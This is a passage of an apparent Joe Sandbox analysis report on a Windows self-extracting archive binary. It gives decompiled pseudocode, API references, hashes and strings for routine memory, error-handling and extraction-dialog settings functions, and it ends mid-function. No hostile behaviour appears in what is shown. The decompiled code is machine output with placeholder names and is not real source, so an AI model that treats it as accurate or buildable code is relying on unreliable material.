0x00411273
0x0041127b
0x0041127f

APIs

SetFileTime.KERNELBASE(?,?,?,?,0041128F,00000000,00000000,?,0040270B,?), ref: 00411273

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: FileTime
String ID:
API String ID: 1425588814-0
Opcode ID: 5e2c3f4fd95572551ce7389ed7a8d0418e4bf28c6d4fd737443a5967939eb4fb
Instruction ID: 14e9d413570242a207ede0755a0e187765c1d7efe63821fc46ad5d1f7ad43643
Opcode Fuzzy Hash: 5e2c3f4fd95572551ce7389ed7a8d0418e4bf28c6d4fd737443a5967939eb4fb
Instruction Fuzzy Hash: 23C04C36159105FFCF020FB0CC04C1ABFA2BB99311F10C918B159C4070C7328038EB02

Uniqueness

Uniqueness Score: -1.00%

Function 004191C3, Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

_onexit.KERNELBASE ref: 004191CF

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: _onexit
String ID:
API String ID: 572287377-0
Opcode ID: 48837c0521fbecc17d6ee07b3f6a267320efd1aba5eb5955c623cdeff6951d1a
Instruction ID: 778c79cf90d092554f1cb830e8a390e88a3e661b3811335a0444426046a09963
Opcode Fuzzy Hash: 48837c0521fbecc17d6ee07b3f6a267320efd1aba5eb5955c623cdeff6951d1a
Instruction Fuzzy Hash: E1B01275003000FBCF051F40ED0888D7F21EB44322B20C465F00A81031C7328430BB06

Uniqueness

Uniqueness Score: -1.00%

Function 00401341, Relevance: 1.3, APIs: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00401341(void* __ecx, void* __eflags) {
				intOrPtr* _t9;
				intOrPtr* _t10;
				intOrPtr* _t12;
				signed int _t13;
				intOrPtr* _t23;
				void* _t25;

				_t25 = __ecx;
				_t9 = E004011CA(__ecx);
				if(_t9 == 0) {
					_push(0xc);
					L004191BC();
					if(_t9 == 0) {
						_t23 = 0;
					} else {
						 *((intOrPtr*)(_t9 + 4)) = 0x41c250;
						 *((intOrPtr*)(_t9 + 8)) = 0;
						 *_t9 = 0x41a5f0;
						 *((intOrPtr*)(_t9 + 4)) = 0x41a5e0;
						_t23 = _t9;
					}
					_t4 = _t25 + 4; // 0xbc25d8
					_t10 =  *_t4;
					 *((intOrPtr*)( *_t10 + 0x10))(_t10, 0, 0, 0, 0);
					_t6 = _t25 + 8; // 0xbc2608
					_t12 =  *_t6;
					_t7 = _t25 + 4; // 0xbc25d8
					_t13 =  *((intOrPtr*)( *_t12 + 0xc))(_t12,  *_t7, 0x41ba98, _t23);
					asm("sbb al, al");
					return  ~_t13 + 1;
				} else {
					return 1;
				}
			}

0x00401342
0x00401344
0x0040134b
0x00401352
0x00401354
0x0040135e
0x0040137b
0x00401360
0x00401360
0x00401367
0x0040136a
0x00401370
0x00401377
0x00401377
0x0040137d
0x0040137d
0x00401387
0x0040138a
0x0040138a
0x0040138d
0x0040139a
0x0040139f
0x004013a5
0x0040134d
0x00401350
0x00401350

APIs

??2@YAPAXI@Z.MSVCRT ref: 00401354

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: cc3bab8da8374e2612e1de8916ac955e32d0819bb3d2e40bab94f9b8b3e489fa
Instruction ID: 9b740768f600bbd434f173913778787e3c0435d902e00cab9e4412b019abca16
Opcode Fuzzy Hash: cc3bab8da8374e2612e1de8916ac955e32d0819bb3d2e40bab94f9b8b3e489fa
Instruction Fuzzy Hash: 7FF02270104210AFD7188B65D84EC97B7E8EF85320305C4AEF81ACB3A1D778EC82C6A4

Uniqueness

Uniqueness Score: -1.00%

Function 004122B3, Relevance: 1.3, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E004122B3(void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr* _a16) {
				void* _t12;
				signed int _t13;
				signed int _t15;
				intOrPtr* _t20;
				intOrPtr _t24;

				_t24 = _a4;
				_push( &_a12);
				_t12 = E0041124F(_t24 + 0x14, _a8, _a12); // executed
				_t20 = _a16;
				if(_t20 != 0) {
					 *_t20 = _a12;
				}
				if(_t12 != 0) {
					return 0;
				}
				_t13 = GetLastError();
				__eflags =  *(_t24 + 0x1c);
				if( *(_t24 + 0x1c) != 0) {
					return  *((intOrPtr*)( *( *(_t24 + 0x1c))))( *((intOrPtr*)(_t24 + 0x20)), _t13);
				}
				__eflags = _t13;
				if(__eflags == 0) {
					return 0x80004005;
				}
				if(__eflags > 0) {
					_t15 = _t13 & 0x0000ffff | 0x80070000;
					__eflags = _t15;
					return _t15;
				}
				return _t13;
			}

0x004122b7
0x004122bd
0x004122c7
0x004122cc
0x004122d1
0x004122d6
0x004122d6
0x004122da
0x00000000
0x004122dc
0x004122e0
0x004122e6
0x004122ea
0x00000000
0x004122f5
0x004122f9
0x004122fb
0x00000000
0x004122fd
0x00412304
0x0041230b
0x0041230b
0x00000000
0x0041230b
0x00412312

APIs

GetLastError.KERNEL32(?,?,?), ref: 004122E0

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: d509e3b73838843a45d009e079e0ca887772c46ed55d806236c8cbc1e203ec92
Instruction ID: 6d5529d2897140aadd979f9f6666313ec97981f96f3cf44ff7ecc7f719b31ebf
Opcode Fuzzy Hash: d509e3b73838843a45d009e079e0ca887772c46ed55d806236c8cbc1e203ec92
Instruction Fuzzy Hash: 3AF06D7120020ADBCB248E64C900AFB7765FF00314F10496AED16D6660D3BDE8A6DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00411972, Relevance: 1.3, APIs: 1, Instructions: 22
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 87%

			E00411972(signed int* __ecx, void* __eflags, signed int _a4) {
				signed int _t12;
				signed int _t19;
				signed int _t21;

				_t21 = _a4;
				 *__ecx =  *__ecx & 0x00000000;
				_t19 = 2;
				_t12 = (_t21 + 1) * _t19;
				_push( ~(0 | __eflags > 0x00000000) | _t12); // executed
				L004191BC(); // executed
				__ecx[1] = _t21;
				__ecx[2] = _t21;
				 *__ecx = _t12;
				return _t12;
			}

0x00411974
0x0041197a
0x00411981
0x00411985
0x0041198e
0x0041198f
0x00411995
0x00411998
0x0041199c
0x0041199f

APIs

??2@YAPAXI@Z.MSVCRT ref: 0041198F

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: e76ca8283bca056c9e11813ba6639715687bfc46d2aaafc1486a8ae111247908
Instruction ID: c6dd757af0c1ba279d4dea7c6a80b7e4f73fa27ff16b3e9179e8d8f42dc612cd
Opcode Fuzzy Hash: e76ca8283bca056c9e11813ba6639715687bfc46d2aaafc1486a8ae111247908
Instruction Fuzzy Hash: ABE01D735052015FD3248F2DD507657F7E9DFD0320F14C52FD596C7290DB74A4818554

Uniqueness

Uniqueness Score: -1.00%

Function 00402963, Relevance: 1.3, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402963(void* __eax, void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t3;
				void* _t9;
				void* _t10;

				_t9 = __edx;
				_push(0x18);
				_t10 = __ecx; // executed
				L004191BC(); // executed
				if(__eax == 0) {
					_t3 = 0;
				} else {
					_t3 = E004025AB(__eax, _a4);
				}
				return E004027AC(_t10, _t9, _t3);
			}

0x00402963
0x00402964
0x00402966
0x00402968
0x00402970
0x0040297f
0x00402972
0x00402978
0x00402978
0x0040298a

APIs

??2@YAPAXI@Z.MSVCRT ref: 00402968

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 0ff7525446d3e4eb81a6196f1d1764e26671874c856a9aad507146e1b99962d7
Instruction ID: 3c4924e632bf8de9284e3dfcfd8e31cb7db5e3eb6efac072798042e24d92b66a
Opcode Fuzzy Hash: 0ff7525446d3e4eb81a6196f1d1764e26671874c856a9aad507146e1b99962d7
Instruction Fuzzy Hash: 26D0A96270421232DA542136192A9AF04850BA1324B04083FBC09BA2D0DDBCCC82929D

Uniqueness

Uniqueness Score: -1.00%

Function 00418E90, Relevance: 1.3, APIs: 1, Instructions: 10
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418E90(long __ecx) {
				void* _t1;

				if(__ecx != 0) {
					_t1 = VirtualAlloc(0, __ecx, 0x1000, 4); // executed
					return _t1;
				} else {
					return 0;
				}
			}

0x00418e92
0x00418ea1
0x00418ea7
0x00418e94
0x00418e96
0x00418e96

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,004126A3), ref: 00418EA1

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: cfd591f57166502c3996eeb52ba497cf8e1c0d4e19f98a0caefb48489f851d59
Instruction ID: 571c065075a9a1381f58638ba6fca5ee0bdf2100e8ed77eb0067926671c236e0
Opcode Fuzzy Hash: cfd591f57166502c3996eeb52ba497cf8e1c0d4e19f98a0caefb48489f851d59
Instruction Fuzzy Hash: C3B012B07E234035FE684F204C0BFE729106344B5BF10806CB305E80C4EBD45440501D

Uniqueness

Uniqueness Score: -1.00%

Function 00418E60, Relevance: 1.3, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418E60(int __ecx) {
				void* _t1;

				if(__ecx != 0) {
					_t1 = malloc(__ecx); // executed
					return _t1;
				} else {
					return 0;
				}
			}

0x00418e62
0x00418e68
0x00418e71
0x00418e64
0x00418e66
0x00418e66

APIs

malloc.MSVCRT ref: 00418E68

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: e711c72adcf938b8c65d85f746aed726eb56a957d15baed71f8ebda879dc1b73
Instruction ID: e2a553e11ccdc75bfd9e09a2a759721d75f2ab5807daf84bd34e7484f2f3f46e
Opcode Fuzzy Hash: e711c72adcf938b8c65d85f746aed726eb56a957d15baed71f8ebda879dc1b73
Instruction Fuzzy Hash: 47B012B011210106DE1C03343C040973150274070BBC049BDB402C0211FB2EC024500F

Uniqueness

Uniqueness Score: -1.00%

Function 00418ED0, Relevance: 1.3, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418ED0(int __edx) {
				void* _t1;

				if(__edx != 0) {
					_t1 = malloc(__edx); // executed
					return _t1;
				} else {
					return 0;
				}
			}

0x00418ed2
0x00418ed8
0x00418ee1
0x00418ed4
0x00418ed6
0x00418ed6

APIs

malloc.MSVCRT ref: 00418ED8

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 5141d728e474e7521a368291e8f18d83c3acb210d46f4bca5788423dd7cb6c14
Instruction ID: 93b00212a99b6a082cadc79a1e30e4f7e8762bb5dbef7d3919aab0975435a3d9
Opcode Fuzzy Hash: 5141d728e474e7521a368291e8f18d83c3acb210d46f4bca5788423dd7cb6c14
Instruction Fuzzy Hash: DCB012A890118102DA0403343C04093317277D070B7C4C8F9A401C0215FF3DC038600E

Uniqueness

Uniqueness Score: -1.00%

Function 00418EB0, Relevance: 1.3, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418EB0(void* __ecx) {
				void* _t1;
				int _t2;

				if(__ecx != 0) {
					_t2 = VirtualFree(__ecx, 0, 0x8000); // executed
					return _t2;
				}
				return _t1;
			}

0x00418eb2
0x00418ebc
0x00000000
0x00418ebc
0x00418ec2

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000,0041269C), ref: 00418EBC

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 98c2aa6179cb7425aeb67d4f545a5e2afc36e1fc0ccae7b31786c0746bb73036
Instruction ID: 0e3cf457c684582be7836cc479f2286583ff41d20b64db86ad3597c1f4fbeca2
Opcode Fuzzy Hash: 98c2aa6179cb7425aeb67d4f545a5e2afc36e1fc0ccae7b31786c0746bb73036
Instruction Fuzzy Hash: D2B0127074230022ED3807110D05B9716001700702F10801C3205A40C08B9DA404450C

Uniqueness

Uniqueness Score: -1.00%

Function 00418E80, Relevance: 1.3, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

free.MSVCRT(?,0040FF00), ref: 00418E81

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: e67894145b99b58128abb99e60c4f0f8425ba21e255e0df04cc2fc7601b1b592
Instruction ID: 274342a45a8081fe27f7bdb5d6c884acc69a6842209db99ac87ec0640da087f0
Opcode Fuzzy Hash: e67894145b99b58128abb99e60c4f0f8425ba21e255e0df04cc2fc7601b1b592
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00418EF1, Relevance: 1.3, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00418EF1

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: e74c70c6999e5317b9509654f16dd5251969b965aacf69294b6ffea9f9e2b663
Instruction ID: 1f3b28ff6c5a90f3ca056b026900e47eaa4da2a5162f9c1f96bfe5ec7c3f15e6
Opcode Fuzzy Hash: e74c70c6999e5317b9509654f16dd5251969b965aacf69294b6ffea9f9e2b663
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00405811, Relevance: 40.4, APIs: 3, Strings: 20, Instructions: 185
stringCOMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00405811(void* __ecx) {
				signed int _v8;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t14;
				WCHAR* _t15;
				signed short* _t16;
				signed int _t18;
				void* _t24;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				signed int _t31;
				signed int _t35;
				intOrPtr _t41;
				intOrPtr _t45;
				void* _t68;
				void* _t73;
				void* _t76;
				intOrPtr _t98;
				void* _t99;
				intOrPtr* _t104;

				_push(__ecx);
				_t98 = E00405041();
				if(_t98 != 0) {
					E00411BE5(0x41e85c, _t98);
					_t73 = 4;
					E00411CA3(0x41e85c, E00403DC8(_t73));
					_t41 =  *0x41e85c; // 0xbcef60
					 *0x41e760 = _t41;
					E00411BE5(0x41e884, _t98);
					_t76 = 0x29;
					E00411CA3(0x41e884, E00403DC8(_t76));
					_t45 =  *0x41e884; // 0xbc1220
					 *0x41e74c = _t45;
					 *0x41e738 = _t98;
				}
				_t12 = E00405041();
				if(_t12 != 0) {
					 *0x41e760 = _t12;
				}
				_t13 = E00405041();
				if(_t13 != 0) {
					 *0x41e74c = _t13;
				}
				_t14 = E00405041();
				if(_t14 != 0) {
					 *0x41e73c = _t14;
				}
				_t15 = E00405041();
				if(_t15 != 0 && lstrcmpiW(_t15, L"no") == 0) {
					 *0x41e770 = 2;
				}
				_t16 = E00405041();
				_t99 = 0x30;
				if(_t16 != 0) {
					_t35 =  *_t16 & 0x0000ffff;
					if(_t35 >= _t99 && _t35 <= 0x32) {
						 *0x41e770 = _t35 - _t99;
					}
				}
				if(E00405041() != 0) {
					E004056E9(_t17);
				}
				_v8 = _v8 & 0x00000000;
				while(1) {
					_t18 = E00405041();
					if(_t18 == 0) {
						break;
					}
					_v8 = _v8 + 1;
					E004056A4(_t18);
				}
				_v8 = _v8 & _t18;
				while(E00405041() != 0) {
					_v8 = _v8 + 1;
					E004056CB(_t20);
				}
				 *0x41e750 = E00405041();
				 *0x41e758 = E00405041();
				_t24 = E00405041();
				_t104 = __imp___wtol;
				if(_t24 != 0) {
					 *0x41e450 =  *_t104(_t24);
				}
				_t25 = E00405041();
				if(_t25 != 0) {
					 *0x41e454 =  *_t104(_t25);
				}
				_t26 = E00405041();
				if(_t26 != 0) {
					 *0x41e754 = _t26;
				}
				_t27 = E00405041();
				if(_t27 != 0) {
					 *0x41e748 = _t27;
				}
				_t28 = E00405041();
				if(_t28 != 0) {
					 *0x41e744 = _t28;
				}
				_t29 = E00405041();
				if(_t29 == 0) {
					_t29 =  *0x41e738; // 0xbce7c8
				}
				 *0x41e764 = _t29;
				_t30 = E00405041();
				if(_t30 == 0) {
					_t68 = 0x2c;
					_t30 = E00403DC8(_t68);
				}
				 *0x41e768 = _t30;
				_t31 = E00405041();
				if(_t31 != 0) {
					_t31 =  *_t31 & 0x0000ffff;
					if(_t31 >= _t99 && _t31 <= 0x39) {
						_t31 = _t31 - _t99;
						 *0x41e76c = _t31;
					}
				}
				return _t31;
			}

0x00405814
0x00405823
0x00405827
0x00405831
0x00405838
0x00405841
0x00405846
0x00405853
0x00405858
0x0040585f
0x00405868
0x0040586d
0x00405872
0x00405877
0x00405877
0x00405884
0x0040588b
0x0040588d
0x0040588d
0x00405899
0x004058a0
0x004058a2
0x004058a2
0x004058ae
0x004058b5
0x004058b7
0x004058b7
0x004058c3
0x004058ca
0x004058dc
0x004058dc
0x004058ed
0x004058f4
0x004058f7
0x004058f9
0x004058ff
0x00405908
0x00405908
0x004058ff
0x0040591b
0x0040591f
0x0040591f
0x00405924
0x00405939
0x0040593e
0x00405945
0x00000000
0x00000000
0x0040592f
0x00405934
0x00405934
0x00405947
0x0040595b
0x00405951
0x00405956
0x00405956
0x0040597c
0x0040598d
0x00405992
0x00405997
0x0040599f
0x004059a5
0x004059a5
0x004059b1
0x004059b8
0x004059be
0x004059be
0x004059ca
0x004059d1
0x004059d3
0x004059d3
0x004059df
0x004059e6
0x004059e8
0x004059e8
0x004059f4
0x004059fb
0x004059fd
0x004059fd
0x00405a09
0x00405a10
0x00405a12
0x00405a12
0x00405a1e
0x00405a23
0x00405a2a
0x00405a2e
0x00405a2f
0x00405a2f
0x00405a3b
0x00405a40
0x00405a47
0x00405a49
0x00405a4f
0x00405a56
0x00405a58
0x00405a58
0x00405a4f
0x00405a60

APIs

lstrcmpiW.KERNEL32(00000000,0041BACC,?,0041E138,?,?,004066DE,?,00000000), ref: 004058D2
_wtol.MSVCRT(00000000,?,0041E138,?,?,004066DE,?), ref: 004059A2
_wtol.MSVCRT(00000000,?,0041E138,?,?,004066DE,?), ref: 004059BB

Part of subcall function 00411BE5: ??2@YAPAXI@Z.MSVCRT ref: 00411C17
Part of subcall function 00411BE5: ??3@YAXPAX@Z.MSVCRT ref: 00411C20
Part of subcall function 00411BE5: memcpy.MSVCRT ref: 00411C38

Part of subcall function 00411CA3: memcpy.MSVCRT ref: 00411CD0

Part of subcall function 00403DC8: GetLastError.KERNEL32(?,?,00000000), ref: 00403E17
Part of subcall function 00403DC8: wsprintfW.USER32 ref: 00403E28
Part of subcall function 00403DC8: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00403E3D
Part of subcall function 00403DC8: GetLastError.KERNEL32 ref: 00403E42
Part of subcall function 00403DC8: ??2@YAPAXI@Z.MSVCRT ref: 00403E5D
Part of subcall function 00403DC8: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00403E70
Part of subcall function 00403DC8: GetLastError.KERNEL32 ref: 00403E77
Part of subcall function 00403DC8: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00403E8C
Part of subcall function 00403DC8: ??3@YAXPAX@Z.MSVCRT ref: 00403E9C
Part of subcall function 00403DC8: SetLastError.KERNEL32(?), ref: 00403EC3
Part of subcall function 00403DC8: lstrlenA.KERNEL32(0041B930), ref: 00403EF9
Part of subcall function 00403DC8: ??2@YAPAXI@Z.MSVCRT ref: 00403F14
Part of subcall function 00403DC8: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00403F46

Part of subcall function 004056CB: _wtol.MSVCRT(00000000,00000030,GUIFlags,00405939,?,0041E138,?,?,004066DE,?), ref: 00405668

Strings

Progress, xrefs: 004058BE
ErrorTitle, xrefs: 0040587F
ExtractCancelText, xrefs: 0040596B
ExtractPathText, xrefs: 004059DA
ExtractPathTitle, xrefs: 004059C5
ExtractDialogWidth, xrefs: 00405988
WarningTitle, xrefs: 00405894
VolumeNameStyle, xrefs: 00405A36
ExtractTitle, xrefs: 004058A9
ExtractDialogText, xrefs: 00405977
OverwriteMode, xrefs: 0040590F
GUIFlags, xrefs: 00405928
GUIMode, xrefs: 004058E8
ExtractPathWidth, xrefs: 004059AC
Title, xrefs: 00405819
PasswordText, xrefs: 00405A19
PasswordTitle, xrefs: 00405A04
CancelPrompt, xrefs: 004059EF
MiscFlags, xrefs: 0040594A
\A, xrefs: 00405829

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ErrorLast$??2@_wtol$??3@EnvironmentVariablelstrcmpimemcpy$InfoLocalelstrlenwsprintf
String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$PasswordText$PasswordTitle$Progress$Title$VolumeNameStyle$WarningTitle$\A
API String ID: 730802180-3281108388
Opcode ID: 4833a71524584f7b56f0bf71057d22a1d3a203c273a0d2e7db0efd1fbdcbf9ec
Instruction ID: b5e5bdf9c584833b01f0c934a091df39086854388a50827319ec31f510801f87
Opcode Fuzzy Hash: 4833a71524584f7b56f0bf71057d22a1d3a203c273a0d2e7db0efd1fbdcbf9ec
Instruction Fuzzy Hash: 68514DB5B01A0087FB18EB7799115AB66DADF84358704C43B9815E73D2FF3C89818E5D

Uniqueness

Uniqueness Score: -1.00%

Function 00403DC8, Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 148
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00403DC8(WCHAR* __ecx) {
				WCHAR* _v8;
				long _v12;
				long _v16;
				short _v104;
				short _v168;
				WCHAR* _t52;
				short* _t55;
				WCHAR* _t60;
				int _t61;
				WCHAR* _t65;
				long _t67;
				WCHAR* _t68;
				WCHAR* _t69;
				int _t71;
				intOrPtr* _t73;
				char* _t78;
				WCHAR* _t79;
				signed int _t94;
				signed int _t96;
				int _t101;
				WCHAR* _t102;
				signed int _t103;
				signed int _t104;
				intOrPtr _t107;

				_t79 = __ecx;
				_t103 = 0;
				_v8 = __ecx;
				_t107 =  *0x41e148; // 0x1
				if(_t107 == 0) {
					L4:
					_t104 = _t103 << 4;
					if( *((intOrPtr*)(_t104 + 0x41e148)) != 0) {
						_v16 = GetLastError();
						wsprintfW( &_v104, L"SfxString%d", _v8);
						_v12 = GetEnvironmentVariableW( &_v104, 0, 0);
						__eflags = GetLastError();
						if(__eflags != 0) {
							L17:
							SetLastError(_v16);
							_t28 = _t104 + 0x41e154; // 0x0
							_t52 =  *_t28;
							__eflags = _t52;
							if(_t52 == 0) {
								_t29 = _t104 + 0x41e14c; // 0x41b930
								_t78 =  *_t29;
								__eflags =  *(_t104 + 0x41e150) - _t52;
								if(__eflags != 0) {
									__eflags = E00403D6D(_t52) -  *0x41ba18; // 0x419
									if(__eflags == 0) {
										_t31 = _t104 + 0x41e150; // 0x41b848
